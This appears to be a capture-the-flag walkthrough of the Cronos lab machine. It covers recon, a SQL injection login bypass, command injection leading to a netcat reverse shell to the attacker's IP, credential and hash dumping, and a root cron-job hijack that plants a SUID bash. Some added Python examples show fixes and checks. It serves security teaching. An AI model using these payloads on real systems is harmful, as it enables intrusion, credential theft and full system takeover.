Cronos

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.227.211:22
Open 10.129.227.211:53
Open 10.129.227.211:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.227.211
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-26 21:25 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:25
Completed Parallel DNS resolution of 1 host. at 21:25, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:25
Scanning 10.129.227.211 [3 ports]
Discovered open port 53/tcp on 10.129.227.211
Discovered open port 80/tcp on 10.129.227.211
Discovered open port 22/tcp on 10.129.227.211
Completed Connect Scan at 21:25, 0.07s elapsed (3 total ports)
Initiating Service scan at 21:25
Scanning 3 services on 10.129.227.211
Completed Service scan at 21:25, 6.21s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.211.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 8.41s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Nmap scan report for 10.129.227.211
Host is up, received user-set (0.072s latency).
Scanned at 2024-11-26 21:25:38 UTC for 15s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ=
|   256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx
53/tcp open  domain  syn-ack ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds

DNS

TCP/53 being open suggests BIND is serving a zone rather than just resolving. Querying the bare IP as a name gets nothing (the timeouts below); a reverse (PTR) lookup against the server itself does:

└─$ dig ANY 10.129.227.211 @10.129.227.211
;; communications error to 10.129.227.211#53: timed out
;; communications error to 10.129.227.211#53: timed out
;; communications error to 10.129.227.211#53: timed out

; <<>> DiG 9.19.21-1-Debian <<>> ANY 10.129.227.211 @10.129.227.211
;; global options: +cmd
;; no servers could be reached

└─$ dig -x 10.129.227.211 @10.129.227.211

; <<>> DiG 9.19.21-1-Debian <<>> -x 10.129.227.211 @10.129.227.211
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24675
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;211.227.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
211.227.129.10.in-addr.arpa. 604800 IN  PTR     ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.    604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 72 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (UDP)
;; WHEN: Tue Nov 26 16:26:16 EST 2024
;; MSG SIZE  rcvd: 114

The PTR answer leaks the domain and its nameserver, ns1.cronos.htb. Note that the A record points at 10.10.10.13 rather than the address being scanned, so the zone data can't be trusted for name resolution: map cronos.htb to 10.129.227.211 in /etc/hosts by hand, then query the zone itself:

└─$ dig ANY cronos.htb @10.129.227.211

; <<>> DiG 9.19.21-1-Debian <<>> ANY cronos.htb @10.129.227.211
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36564
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      ANY

;; ANSWER SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 76 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (TCP)
;; WHEN: Tue Nov 26 16:31:32 EST 2024
;; MSG SIZE  rcvd: 131

The SOA, NS and A records confirm the server is authoritative for cronos.htb. A zone transfer (dig axfr cronos.htb @10.129.227.211) is the natural next check for further hostnames; the Host-header fuzzing below finds them either way.

HTTP (80)

Writeup.png

Directory enumeration against cronos.htb (mapped to the box in /etc/hosts) turns up nothing:

└─$ feroxbuster -u 'http://cronos.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

Virtual-host fuzzing on the Host header, filtering out the 380-line response that unknown names return, finds two more names:

└─$ domain='cronos.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 380
       v2.1.0-dev
________________________________________________
admin                   [Status: 200, Size: 1547, Words: 525, Lines: 57, Duration: 105ms]
www                     [Status: 200, Size: 2319, Words: 990, Lines: 86, Duration: 3917ms]

SQLi

Writeup-1.png

A classic authentication bypass logs us in: the quote closes the username string and `-- -` comments out the rest of the WHERE clause, so the password is never compared and anything works:

admin' -- -
Writeup-2.png
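To make the bypass concrete, an added example (not code from the original writeup or from the box): the login reimplemented against an in-memory SQLite table shaped like the users table dumped later (id, username, password as unsalted MD5). The vulnerable version builds the SQL by string concatenation, which is an assumption about how the admin page does it; the fixed version binds parameters. The stored credentials in the example are made up.

```python
"""Login bypass with admin' -- - : string-built SQL beside a parameterised query.

Added example, not code from the original writeup. The table layout mirrors the
users table dumped from the box (id, username, password as unsalted MD5); the row
contents are constructed, and the query shape is an assumption about the app.
"""
import hashlib
import sqlite3


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # constructed sample credentials; the real hash is in the SQL dump further down
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                ("admin", md5_hex("correct horse")))
    return con


def vulnerable_query(username: str, password: str) -> str:
    # User input is pasted straight into the statement, as the unsafe PHP form
    # "... WHERE username='$user' AND password='" . md5($pass) . "'" would do.
    return ("SELECT id FROM users WHERE username='%s' AND password='%s'"
            % (username, md5_hex(password)))


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    # With username = "admin' -- -" the statement becomes
    #   SELECT id FROM users WHERE username='admin' -- -' AND password='...'
    # and everything after -- is a comment, so the password is never checked.
    return con.execute(vulnerable_query(username, password)).fetchone() is not None


def login_fixed(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the quote and the comment sequence stay inside the value.
    row = con.execute(
        "SELECT id FROM users WHERE username=? AND password=?",
        (username, md5_hex(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query("admin' -- -", "anything"))
    print("vulnerable login:", login_vulnerable(db, "admin' -- -", "anything"))
    print("fixed login:     ", login_fixed(db, "admin' -- -", "anything"))
```

The `-- -` form (rather than a bare `--`) is the MySQL habit: MySQL needs whitespace after `--` for it to start a comment, and the trailing `-` guarantees something follows that space even if the application trims the input.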

Command Injection

The admin page takes an IP address and passes it to a shell command, so a basic separator payload works first try: `;` terminates the intended command and whatever follows runs as well.

Writeup-3.png
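An added example (not the box's code) of the pattern behind this bug and its fix: a "ping this host" handler that interpolates user input into a shell command line, next to one that validates the field as an IP address and runs the tool without a shell. `echo` stands in for the network tool so it runs offline, and the marker string `INJECTED` replaces the writeup's netcat payload; the exact command line the admin page runs is not shown on the page and is assumed here.

```python
"""Command injection in a 'ping this host' handler, beside a hardened version.

Added example, not the box's code. `echo` stands in for the network tool so the
demo runs offline; the admin page's real command line is not shown in the writeup
and is assumed to be "<tool> <user input>" run through a shell.
"""
import ipaddress
import subprocess


def run_vulnerable(target: str) -> str:
    # User input is interpolated into a command string and handed to /bin/sh, so
    # shell metacharacters (; | && ` $( )) break out of the intended command.
    cmd = f"echo pinging {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ip(target: str) -> str:
    # Allow-list check: the field is an IP address, so accept only a literal IP.
    # ipaddress raises ValueError on anything else, e.g. "8.8.8.8; id".
    return str(ipaddress.ip_address(target.strip()))


def run_fixed(target: str) -> str:
    # No shell involved: argv is passed directly to exec, and the argument has
    # already been validated, so a separator payload is rejected before anything runs.
    argv = ["echo", "pinging", validate_ip(target)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def injection_succeeded(output: str, marker: str) -> bool:
    # True when text that should have been data was executed as a second command.
    return marker in output


if __name__ == "__main__":
    payload = "8.8.8.8; echo INJECTED"
    print(run_vulnerable(payload), end="")
    try:
        run_fixed(payload)
    except ValueError as err:
        print("rejected:", err)
```

Validation alone is not enough if the input still reaches a shell (a hostname field, say, can't be reduced to `ip_address`); dropping `shell=True` and passing an argv list is the part that actually removes the injection primitive, and the allow-list is defence in depth on top of it.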

Reverse shell through the same field (busybox nc is on the box; `listen` is a local alias wrapping ncat), then `script` to upgrade the raw socket to a pty:

8.8.8.8; busybox nc 10.10.14.99 4444 -e /bin/bash; 
└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.227.211:41234.
script /dev/null -qc /bin/bash
www-data@cronos:/var/www/admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$ cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' -e 'SHOW DATABASES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| information_schema |
| admin              |
+--------------------+
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' admin -e 'SHOW TABLES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-----------------+
| Tables_in_admin |
+-----------------+
| users           |
+-----------------+
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' admin -e 'SELECT * FROM users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+

The password column is a bare 32-hex digest, i.e. unsalted MD5, so it's a lookup-table job:

https://md5hashing.net/hash/md5/4f5fffa7b2340178a716e3832451e058

Creds: admin:1327663704
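A small added example (not from the original writeup) that checks the looked-up password against the dumped hash offline, which is worth doing before trusting a third-party site and is also how a wordlist attack on a bare MD5 works. The hash is the one from the users table above; the wordlist is constructed for the demo.

```python
"""Verify the looked-up password offline instead of trusting a third-party site.

Added example, not from the original writeup. DUMPED_HASH is the admin row from
the users table above; WORDLIST is constructed for the demo (a real run reads
rockyou or similar).
"""
import hashlib
from typing import Iterable, Optional

DUMPED_HASH = "4f5fffa7b2340178a716e3832451e058"   # admin's password column
WORDLIST = ["password", "admin", "cronos", "1327663704"]   # constructed


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def looks_like_md5(h: str) -> bool:
    # 32 hex chars and no salt/scheme prefix: a bare MD5 (or MD4/NTLM) digest.
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def crack_md5(target: str, words: Iterable[str]) -> Optional[str]:
    """First word whose MD5 equals target, or None. Raises on non-MD5 input."""
    if not looks_like_md5(target):
        raise ValueError("not a bare 32-hex digest")
    target = target.lower()
    for w in words:
        if md5_hex(w) == target:
            return w
    return None


if __name__ == "__main__":
    print(crack_md5(DUMPED_HASH, WORDLIST))
```

At scale the same thing is `hashcat -m 0 hash.txt rockyou.txt`; the point here is that an unsalted MD5 of a short numeric password falls instantly, and that nothing about the hash needs to leave the engagement.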

Only three accounts have a login shell:

www-data@cronos:/var/www/admin$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash

The recovered credentials don't work over SSH.

Cronjob

/etc/crontab shows a Laravel scheduler job that root runs every minute:

www-data@cronos:/var/www/admin$ cat /etc/crontab
...
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
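The general check behind this finding, as an added example (not from the original writeup): parse /etc/crontab-style entries, and for every job that runs as someone else, report absolute paths on its command line that are regular files the current user can write. The hit on the box is /var/www/laravel/artisan, which root hands to php. The sample crontab is constructed around that line; the filesystem check runs for real wherever the script is executed.

```python
"""Spot cron jobs another user runs that reference files we can write.

Added example, not from the original writeup. Parses /etc/crontab-style lines
(five time fields, then user, then command) and reports absolute paths in the
command that are regular files writable by the current user. SAMPLE_CRONTAB is
constructed around the Laravel line from the box.
"""
import os
import re
import tempfile
from typing import List, Tuple

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# absolute paths that are separate tokens; stops at shell separators/redirects
ABS_PATH = re.compile(r"(?<!\S)(/[^\s;&|<>]+)")


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """(user, command) pairs. Skips comments, VAR=value lines and @reboot-style entries."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        jobs.append((parts[5], parts[6]))
    return jobs


def writable_files(command: str) -> List[str]:
    """Absolute paths in the command line that are writable regular files."""
    return [p for p in ABS_PATH.findall(command)
            if os.path.isfile(p) and os.access(p, os.W_OK)]


def find_hijackable_jobs(text: str, me: str = "") -> List[Tuple[str, str, List[str]]]:
    """Jobs run as another user whose command line touches a file we can modify."""
    me = me or os.environ.get("USER", "")
    hits = []
    for user, command in parse_system_crontab(text):
        if user == me:
            continue
        paths = writable_files(command)
        if paths:
            hits.append((user, command, paths))
    return hits


def demo_with_temp_file() -> List[Tuple[str, str, List[str]]]:
    """Constructed demo: a writable stand-in for artisan in a temp dir, then the check."""
    fake = os.path.join(tempfile.mkdtemp(), "artisan")
    with open(fake, "w") as f:
        f.write("<?php\n")
    crontab = "* * * * *\troot\tphp %s schedule:run >> /dev/null 2>&1\n" % fake
    return find_hijackable_jobs(crontab, me="www-data")


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for user, cmd, paths in find_hijackable_jobs(f.read()):
            print(f"[{user}] {cmd}\n    writable: {', '.join(paths)}")
```

The same idea extends to the directories those paths live in (a writable parent lets you replace the file even if the file itself is root-owned, which is exactly what the `mv artisan artisan.bak` trick below exploits) and to relative command names resolved through the crontab's PATH.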

Method 1

Root runs php /var/www/laravel/artisan every minute and the laravel directory is writable by www-data (the mv below succeeds), so swap artisan for a PHP file that plants a SUID copy of bash. The chmod is harmless but unnecessary, since php reads the file rather than executing it, and 4755 would do instead of 4777 (a world-writable SUID root binary is a gift to anyone else on the box). After the next minute:

www-data@cronos:/var/www/laravel$ mv artisan artisan.bak
www-data@cronos:/var/www/laravel$ echo '<?=`install -m4777 /bin/bash /tmp/rootbash`?>' > artisan
www-data@cronos:/var/www/laravel$ chmod +x artisan
www-data@cronos:/var/www/laravel$ ls /tmp -alh
...
-rwsrwxrwx  1 root root 1014K Nov 26 23:51 rootbash
...
www-data@cronos:/var/www/laravel$ /tmp/rootbash -p
rootbash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

The -p flag is essential: without it bash resets the effective UID to the real UID at startup when the two differ, and the SUID bit buys nothing. uid stays 33 and euid is 0, which is enough to read /root.

Method 2

Follow the docs https://laravel.com/docs/11.x/scheduling#defining-schedules. The linked docs are for Laravel 11, where the schedule lives in routes/console.php; this app is an older Laravel that defines it in the schedule() method of app/Console/Kernel.php, but $schedule->exec() is the same call in both.

www-data@cronos:/var/www/laravel/app/Console$ cat Kernel.php
<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

The file can be reduced to the following; exec() runs an arbitrary shell command on every scheduler tick, which is every minute here:

<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel {
    protected $commands = [];

    protected function schedule(Schedule $schedule) {
        $schedule->exec('install -m4777 /bin/bash /tmp/rootbash2')->everyMinute();
    }

    protected function commands() { require base_path('routes/console.php'); }
}

Because I'm on a plain netcat shell, an interactive editor could hang or kill it, so I transfer the file as base64 instead (`base64 -w0 Kernel.php` locally, decoded on the box):

www-data@cronos:/var/www/laravel/app/Console$ mv Kernel.php Kernel.php.bak
www-data@cronos:/var/www/laravel/app/Console$ base64 -d <<<'<base64 of the Kernel.php above>' > Kernel.php
...
www-data@cronos:/var/www/laravel/app/Console$ ls -alh /tmp/rootbash2
-rwsrwxrwx 1 root root 1014K Nov 27 00:11 /tmp/rootbash2
www-data@cronos:/var/www/laravel/app/Console$ /tmp/rootbash2 -p
rootbash2-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

Flags

rootbash-4.3# cat /home/*/user.txt /root/root.txt
ed70d2e6e37a9e48aa988194bd816d8c
3240644cb49318f82bc4735ee79a2d28
